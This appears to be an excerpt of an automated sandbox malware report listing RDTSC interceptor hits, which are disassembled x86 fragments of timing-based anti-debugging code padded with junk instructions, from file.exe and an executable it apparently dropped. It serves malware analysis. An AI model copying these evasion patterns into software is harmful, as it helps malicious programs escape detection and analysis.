Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2051D second address: 4D20590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7014CC2CC8h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edx, dword ptr [ebp+0Ch] 0x00000011 jmp 00007F7014CC2CC7h 0x00000016 mov esi, edx 0x00000018 jmp 00007F7014CC2CC6h 0x0000001d mov al, byte ptr [edx] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 movsx edi, cx 0x00000025 call 00007F7014CC2CC6h 0x0000002a pop eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20590 second address: 4D20596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20596 second address: 4D205A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D205A5 second address: 4D205A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D205A9 second address: 4D205C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D205C4 second address: 4D20590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 88h 0x00000005 pushfd 0x00000006 jmp 00007F70146AC610h 0x0000000b xor esi, 13F02488h 0x00000011 jmp 00007F70146AC60Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test al, al 0x0000001c pushad 0x0000001d mov ax, 321Bh 0x00000021 movzx esi, dx 0x00000024 popad 0x00000025 jne 00007F70146AC576h 0x0000002b mov al, byte ptr [edx] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx edi, cx 0x00000033 call 00007F70146AC616h 0x00000038 pop eax 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20606 second address: 4D2060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2060A second address: 4D20610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20610 second address: 4D2061E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7014CC2CBAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2061E second address: 4D20650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub edx, esi 0x0000000a jmp 00007F70146AC60Ch 0x0000000f mov edi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F70146AC617h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20650 second address: 4D20655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20655 second address: 4D2069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a jmp 00007F70146AC611h 0x0000000f lea ebx, dword ptr [edi+01h] 0x00000012 pushad 0x00000013 mov eax, 2D026533h 0x00000018 call 00007F70146AC618h 0x0000001d mov ebx, ecx 0x0000001f pop eax 0x00000020 popad 0x00000021 mov al, byte ptr [edi+01h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2069E second address: 4D206A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D206A2 second address: 4D206A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D206A6 second address: 4D206AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D206AC second address: 4D206EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edi 0x0000000a jmp 00007F70146AC60Eh 0x0000000f test al, al 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F70146AC617h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D206EB second address: 4D20732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7014CC2CBFh 0x00000009 sub ax, 29BEh 0x0000000e jmp 00007F7014CC2CC9h 0x00000013 popfd 0x00000014 mov ax, 8B07h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jne 00007F7084D8B011h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov ecx, edx 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20732 second address: 4D2077A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b pushad 0x0000000c call 00007F70146AC60Eh 0x00000011 mov dx, ax 0x00000014 pop esi 0x00000015 jmp 00007F70146AC617h 0x0000001a popad 0x0000001b shr ecx, 02h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2077A second address: 4D2077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2077E second address: 4D20784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20784 second address: 4D20795 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rep movsd 0x0000000b rep movsd 0x0000000d rep movsd 0x0000000f rep movsd 0x00000011 rep movsd 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20795 second address: 4D20799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20799 second address: 4D2079D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2079D second address: 4D207A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207A3 second address: 4D207A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207A9 second address: 4D207AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207AD second address: 4D207B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207B1 second address: 4D207E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a jmp 00007F70146AC613h 0x0000000f and ecx, 03h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F70146AC611h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207E8 second address: 4D2081B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rep movsb 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7014CC2CC8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2081B second address: 4D2082A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2082A second address: 4D20842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7014CC2CC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20842 second address: 4D20846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20846 second address: 4D20861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7014CC2CBAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20861 second address: 4D20867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20867 second address: 4D20898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7014CC2CC8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20898 second address: 4D2089E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2089E second address: 4D208C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7014CC2CBCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D208C2 second address: 4D208DF instructions: 0x00000000 rdtsc 0x00000002 call 00007F70146AC612h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c mov dx, 9054h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D208DF second address: 4D20902 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr fs:[00000000h], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7014CC2CC1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20902 second address: 4D20917 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20917 second address: 4D2091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2091C second address: 4D2093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a jmp 00007F70146AC60Fh 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movzx eax, di 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2093C second address: 4D20973 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 mov ebx, 6555D2BAh 0x0000000e popad 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F7014CC2CBDh 0x0000001a or ch, 00000036h 0x0000001d jmp 00007F7014CC2CC1h 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20973 second address: 4D209B0 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F70146AC60Dh 0x0000000c pushfd 0x0000000d jmp 00007F70146AC610h 0x00000012 or ah, FFFFFF88h 0x00000015 jmp 00007F70146AC60Bh 0x0000001a popfd 0x0000001b pop esi 0x0000001c popad 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D209B0 second address: 4D209C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D209C0 second address: 4D209D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, 2AE883ADh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D209D9 second address: 4D2049E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7014CC2CC9h 0x00000008 mov esi, 69471DB7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 retn 0008h 0x00000013 cmp dword ptr [ebp-2Ch], 10h 0x00000017 mov eax, dword ptr [ebp-40h] 0x0000001a jnc 00007F7014CC2CB5h 0x0000001c push eax 0x0000001d lea edx, dword ptr [ebp-00000590h] 0x00000023 push edx 0x00000024 call esi 0x00000026 push 00000008h 0x00000028 jmp 00007F7014CC2CC6h 0x0000002d push 032520EDh 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20B6D second address: 4D20B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20B73 second address: 4D20B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20B77 second address: 4D20BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F70146AC619h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F70146AC60Ch 0x00000017 and esi, 75D20EC8h 0x0000001d jmp 00007F70146AC60Bh 0x00000022 popfd 0x00000023 mov si, 8C3Fh 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov di, 46C2h 0x00000030 call 00007F70146AC613h 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A04C52 second address: A04C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A04C5F second address: A04C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A04C67 second address: A04C84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F7014CC2CBFh 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F7014CC2CB6h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: 9FED8C second address: 9FED93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A03D24 second address: A03D2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A03D2A second address: A03D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A03FD4 second address: A03FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A03FD8 second address: A03FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jng 00007F70146AC606h 0x0000000f jp 00007F70146AC606h 0x00000015 jmp 00007F70146AC60Ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A04161 second address: A04167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A04167 second address: A0417D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70146AC610h 0x0000000b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A0417D second address: A04195 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7014CC2CB6h 0x00000008 jp 00007F7014CC2CB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F7014CC2CBEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A042E8 second address: A042EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A0601D second address: A0602D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7014CC2CBCh 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A0602D second address: A06031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A06031 second address: A06053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7014CC2CC5h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A06053 second address: A06059 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A06059 second address: A0605F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A0605F second address: A06063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A06063 second address: A0608F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnc 00007F7014CC2CBCh 0x0000000f push 00000000h 0x00000011 sub dword ptr [ebp+122D2A71h], ebx 0x00000017 call 00007F7014CC2CB9h 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A0608F second address: A060AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A060AD second address: A060B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A060B1 second address: A060C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A060C3 second address: A060C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A060C7 second address: A06105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jns 00007F70146AC61Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jne 00007F70146AC60Ch 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A06105 second address: A06115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A06115 second address: A061C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F70146AC617h 0x0000000a popad 0x0000000b pop eax 0x0000000c mov dword ptr [ebp+122D35C4h], eax 0x00000012 push 00000003h 0x00000014 mov edx, 386EBC9Eh 0x00000019 push 00000000h 0x0000001b sub edx, dword ptr [ebp+122D38BDh] 0x00000021 push 00000003h 0x00000023 add dword ptr [ebp+122D34B2h], ecx 0x00000029 push 6C9AED7Bh 0x0000002e push edx 0x0000002f jmp 00007F70146AC617h 0x00000034 pop edx 0x00000035 add dword ptr [esp], 53651285h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F70146AC608h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 lea ebx, dword ptr [ebp+1244AD18h] 0x0000005c mov dword ptr [ebp+122D1C05h], ecx 0x00000062 add dword ptr [ebp+122D34B2h], edx 0x00000068 xchg eax, ebx 0x00000069 push ecx 0x0000006a pushad 0x0000006b jp 00007F70146AC606h 0x00000071 push ebx 0x00000072 pop ebx 0x00000073 popad 0x00000074 pop ecx 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a jno 00007F70146AC606h 0x00000080 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A061C0 second address: A061D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A06275 second address: A06289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A06289 second address: A062CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 4CCFBBF8h 0x0000000e mov dh, 2Dh 0x00000010 push 00000003h 0x00000012 mov dword ptr [ebp+122D358Ah], ebx 0x00000018 mov esi, dword ptr [ebp+122D36F1h] 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D2B91h], ecx 0x00000026 push 00000003h 0x00000028 sub ecx, dword ptr [ebp+122D3679h] 0x0000002e push 85C35E89h 0x00000033 push eax 0x00000034 push edx 0x00000035 js 00007F7014CC2CBCh 0x0000003b jnc 00007F7014CC2CB6h 0x00000041 rdtsc
